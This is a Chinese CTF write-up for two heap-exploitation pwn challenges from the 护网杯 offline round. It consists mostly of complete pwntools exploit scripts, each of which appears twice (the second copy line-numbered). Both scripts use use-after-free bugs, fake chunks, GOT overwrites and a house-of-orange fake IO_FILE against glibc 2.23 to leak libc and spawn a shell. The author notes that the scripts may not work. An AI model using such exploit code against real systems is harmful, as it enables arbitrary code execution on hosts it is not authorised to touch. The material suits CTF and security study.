2020-11-05

护网杯_线下

题目不保证能打通,一个师傅发我的题目,pwn2无libc,看程序编译环境,猜测是16.04系统附件

pwn1

UAF,直接利用name的位置构造一个fake chunk,劫持指针修改lock值,实现任意写

from pwn import*
context.log_level = 'DEBUG'
def menu(ch):
	p.sendlineafter('on...',str(ch))
def new(size,name,content):
	menu(1)
	p.sendlineafter('book:',str(size))
	p.sendafter('name :',name)
	p.sendafter('book:',content)
def free(index):
	menu(2)
	p.sendlineafter('delete??',str(index))
def modify(index,content):
	menu(3)
	p.sendlineafter('modify',str(index))
	p.sendafter('content:',content)
def rename(name):
	menu(4)
	p.sendafter('name:',name)
def edit(index,content):
	menu(5)
	p.sendlineafter('modify',str(index))
	p.sendafter('content:',content)
p = process('./main')
elf =ELF('./main')
libc =ELF('./libc-2.23.so')
p.sendafter('name:','\x00'*0x20 + p64(0) + p64(0x71))
new(0x20,'FMYY','fmyy')
free(0)
free(0)
new(0x60,'FMYY','fmyy')
new(0x21,p64(0x100000001) + p64(1) + p64(0x602150),'fmyy')
free(0)
new(0x60,'\x00'*0x40 + p64(0x6020D0),'fmyy')
edit(0,p64(0xDEAD2CFEF))
modify(0,'\x00'*0x40 + p64(elf.got['free']))
edit(0,p64(elf.plt['puts'])[0:7])
modify(0,'\x00'*0x40 + p64(0x602390 + 0x18))
edit(0,p64(0x602390 + 0x18) + p64(0) + p64(elf.got['read']))
free(1)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read']
log.info('LIBC:\t' + hex(libc_base))

modify(0,'\x00'*0x40 + p64(elf.got['puts']))
edit(0,p64(libc_base + 0xF1207))
p.interactive()

pwn2

UAF漏洞,利用gift中的malloc 爆破从而布置堆,partional write修改chunk头释放进unsorted bin拿到libc,最后利用house of orange 配合scanf时的malloc空间 getshell

from pwn import*
def menu(ch):
	p.sendlineafter('Exit',str(ch))
def new(size,content):
	menu(1)
	p.sendlineafter('Size:',str(size))
	p.sendafter('Content:',content)
def free(index):
	menu(2)
	p.sendlineafter('delete?',str(index))
def show(index):
	menu(3)
	p.sendlineafter('view?',str(index))
def gift(content):
	menu(5)
	p.sendline(content)
p = process('./main')
libc =ELF('./libc-2.23.so')
for i in range(3):
	gift('FMYY')
new(0x18,p64(0) + p64(0x51) + p64(0))
new(0x40,'\x00'*0x30 + p64(0) + p64(0x21))
new(0x40,'FMYY\n')
new(0x40,'FMYY\n')
free(1)
free(2)
free(1)
new(0x40,'\n')
new(0x40,'FMYY\n')
new(0x40,'FMYY\n')
new(0x40,p64(0) + p64(0xA1) + '\n')
free(1)
show(1)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68
log.info('LIBC:\t' + hex(libc_base))

system = libc_base + libc.sym['system']
binsh=libc_base+next(libc.search('/bin/sh'))
unsorted_bins = libc_base + libc.sym['__malloc_hook'] + 0x10 + 88
IO_list_all = libc_base + libc.sym['_IO_list_all']
IO_str_jumps = libc_base + 0x3C37A0

fake_IO_FILE  = p64(0) + p64(0x61) + p64(unsorted_bins) + p64(IO_list_all -0x10)#make the IO_list_all ->fd =main_arena+88
fake_IO_FILE += p64(0) + p64(1)
fake_IO_FILE += p64(0) + p64(binsh)
fake_IO_FILE = fake_IO_FILE.ljust(0xD8,'\x00')
fake_IO_FILE += p64(IO_str_jumps -8)
fake_IO_FILE += p64(0) + p64(system)

free(3)
free(7)
new(0x40,fake_IO_FILE[0:0x40])
new(0x40,fake_IO_FILE[0xB0:])
menu('1'*0x500)
p.interactive()

1	from pwn import*
2	context.log_level = 'DEBUG'
3	def menu(ch):
4	p.sendlineafter('on...',str(ch))
5	def new(size,name,content):
6	menu(1)
7	p.sendlineafter('book:',str(size))
8	p.sendafter('name :',name)
9	p.sendafter('book:',content)
10	def free(index):
11	menu(2)
12	p.sendlineafter('delete??',str(index))
13	def modify(index,content):
14	menu(3)
15	p.sendlineafter('modify',str(index))
16	p.sendafter('content:',content)
17	def rename(name):
18	menu(4)
19	p.sendafter('name:',name)
20	def edit(index,content):
21	menu(5)
22	p.sendlineafter('modify',str(index))
23	p.sendafter('content:',content)
24	p = process('./main')
25	elf =ELF('./main')
26	libc =ELF('./libc-2.23.so')
27	p.sendafter('name:','\x00'*0x20 + p64(0) + p64(0x71))
28	new(0x20,'FMYY','fmyy')
29	free(0)
30	free(0)
31	new(0x60,'FMYY','fmyy')
32	new(0x21,p64(0x100000001) + p64(1) + p64(0x602150),'fmyy')
33	free(0)
34	new(0x60,'\x00'*0x40 + p64(0x6020D0),'fmyy')
35	edit(0,p64(0xDEAD2CFEF))
36	modify(0,'\x00'*0x40 + p64(elf.got['free']))
37	edit(0,p64(elf.plt['puts'])[0:7])
38	modify(0,'\x00'*0x40 + p64(0x602390 + 0x18))
39	edit(0,p64(0x602390 + 0x18) + p64(0) + p64(elf.got['read']))
40	free(1)
41	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read']
42	log.info('LIBC:\t' + hex(libc_base))
43
44	modify(0,'\x00'*0x40 + p64(elf.got['puts']))
45	edit(0,p64(libc_base + 0xF1207))
46	p.interactive()

1	from pwn import*
2	def menu(ch):
3	p.sendlineafter('Exit',str(ch))
4	def new(size,content):
5	menu(1)
6	p.sendlineafter('Size:',str(size))
7	p.sendafter('Content:',content)
8	def free(index):
9	menu(2)
10	p.sendlineafter('delete?',str(index))
11	def show(index):
12	menu(3)
13	p.sendlineafter('view?',str(index))
14	def gift(content):
15	menu(5)
16	p.sendline(content)
17	p = process('./main')
18	libc =ELF('./libc-2.23.so')
19	for i in range(3):
20	gift('FMYY')
21	new(0x18,p64(0) + p64(0x51) + p64(0))
22	new(0x40,'\x00'*0x30 + p64(0) + p64(0x21))
23	new(0x40,'FMYY\n')
24	new(0x40,'FMYY\n')
25	free(1)
26	free(2)
27	free(1)
28	new(0x40,'\n')
29	new(0x40,'FMYY\n')
30	new(0x40,'FMYY\n')
31	new(0x40,p64(0) + p64(0xA1) + '\n')
32	free(1)
33	show(1)
34	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68
35	log.info('LIBC:\t' + hex(libc_base))
36
37	system = libc_base + libc.sym['system']
38	binsh=libc_base+next(libc.search('/bin/sh'))
39	unsorted_bins = libc_base + libc.sym['__malloc_hook'] + 0x10 + 88
40	IO_list_all = libc_base + libc.sym['_IO_list_all']
41	IO_str_jumps = libc_base + 0x3C37A0
42
43	fake_IO_FILE = p64(0) + p64(0x61) + p64(unsorted_bins) + p64(IO_list_all -0x10)#make the IO_list_all ->fd =main_arena+88
44	fake_IO_FILE += p64(0) + p64(1)
45	fake_IO_FILE += p64(0) + p64(binsh)
46	fake_IO_FILE = fake_IO_FILE.ljust(0xD8,'\x00')
47	fake_IO_FILE += p64(IO_str_jumps -8)
48	fake_IO_FILE += p64(0) + p64(system)
49
50	free(3)
51	free(7)
52	new(0x40,fake_IO_FILE[0:0x40])
53	new(0x40,fake_IO_FILE[0xB0:])
54	menu('1'*0x500)
55	p.interactive()